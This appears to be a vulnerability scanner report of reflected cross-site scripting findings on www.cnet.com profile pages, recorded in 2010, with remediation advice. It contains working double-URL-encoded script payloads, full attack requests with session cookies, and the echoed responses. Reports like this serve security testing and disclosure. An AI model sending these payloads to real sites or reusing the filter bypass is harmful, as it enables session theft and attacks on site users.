Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=928
Connection: Keep-Alive
Content-Length: 31035
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mlamonicae8105<script>alert(1)</script>5f027d5a52e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d356c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88bea675716 was submitted in the REST URL parameter 2. This input was echoed as d356c"><script>alert(1)</script>88bea675716 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mlamonicad356c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88bea675716/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:35 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:35 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=949
Connection: Keep-Alive
Content-Length: 31079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mlamonicad356c"><script>alert(1)</script>88bea675716"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dcadc%253cscript%253ealert%25281%2529%253c%252fscript%253e360f87612ee was submitted in the REST URL parameter 2. This input was echoed as dcadc<script>alert(1)</script>360f87612ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mollywooddcadc%253cscript%253ealert%25281%2529%253c%252fscript%253e360f87612ee/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:12 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:13 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 31066
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mollywooddcadc<script>alert(1)</script>360f87612ee's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e369a9b61c84 was submitted in the REST URL parameter 2. This input was echoed as eba0c"><script>alert(1)</script>369a9b61c84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mollywoodeba0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e369a9b61c84/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:11 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:11 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=946
Connection: Keep-Alive
Content-Length: 31192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mollywoodeba0c"><script>alert(1)</script>369a9b61c84"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4255%253cscript%253ealert%25281%2529%253c%252fscript%253effa3008c2d9 was submitted in the REST URL parameter 2. This input was echoed as a4255<script>alert(1)</script>ffa3008c2d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/n3td3va4255%253cscript%253ealert%25281%2529%253c%252fscript%253effa3008c2d9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:51 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:51 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=978
Connection: Keep-Alive
Content-Length: 31047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>n3td3va4255<script>alert(1)</script>ffa3008c2d9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3c03241a2 was submitted in the REST URL parameter 2. This input was echoed as a9969"><script>alert(1)</script>c3c03241a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/n3td3va9969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3c03241a2/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:48 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:49 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=968
Connection: Keep-Alive
Content-Length: 31079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="n3td3va9969"><script>alert(1)</script>c3c03241a2"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c89ac%253cscript%253ealert%25281%2529%253c%252fscript%253e4d06d86a680 was submitted in the REST URL parameter 2. This input was echoed as c89ac<script>alert(1)</script>4d06d86a680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/natalidelcontec89ac%253cscript%253ealert%25281%2529%253c%252fscript%253e4d06d86a680/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:57 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:58 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>natalidelcontec89ac<script>alert(1)</script>4d06d86a680's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18176%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73258364142 was submitted in the REST URL parameter 2. This input was echoed as 18176"><script>alert(1)</script>73258364142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here inside a double-quoted attribute value, so " must be encoded as well as <, > and &) so that a future bypass of the filter does not become script execution.
Request
GET /profile/natalidelconte18176%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73258364142/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:56 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:56 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31146
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="natalidelconte18176"><script>alert(1)</script>73258364142"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0b31%253cscript%253ealert%25281%2529%253c%252fscript%253ebdd5d9c2f73 was submitted in the REST URL parameter 2. This input was echoed as b0b31<script>alert(1)</script>bdd5d9c2f73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here as text between tags, so at least <, > and & must be encoded) so that a future bypass of the filter does not become script execution.
Request
GET /profile/natalieweinsteinb0b31%253cscript%253ealert%25281%2529%253c%252fscript%253ebdd5d9c2f73/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:33 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:33 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>natalieweinsteinb0b31<script>alert(1)</script>bdd5d9c2f73's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2516%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d9e134a7a was submitted in the REST URL parameter 2. This input was echoed as a2516"><script>alert(1)</script>a5d9e134a7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here inside a double-quoted attribute value, so " must be encoded as well as <, > and &) so that a future bypass of the filter does not become script execution.
Request
GET /profile/natalieweinsteina2516%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d9e134a7a/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="natalieweinsteina2516"><script>alert(1)</script>a5d9e134a7a"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32695%253cscript%253ealert%25281%2529%253c%252fscript%253e78657bddaf3 was submitted in the REST URL parameter 2. This input was echoed as 32695<script>alert(1)</script>78657bddaf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value it checks is the value it goes on to use. Validation is not a sufficient fix on its own: the reflected value should also be HTML-encoded at the point where it is written into the response (here as text between tags, so at least <, > and & must be encoded) so that a future bypass of the filter does not become script execution.
Request
GET /profile/ngodong32695%253cscript%253ealert%25281%2529%253c%252fscript%253e78657bddaf3/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:31 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=999 Connection: Keep-Alive Content-Length: 31026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ngodong32695<script>alert(1)</script>78657bddaf3's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54c4c248520 was submitted in the REST URL parameter 2. This input was echoed as b999d"><script>alert(1)</script>54c4c248520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
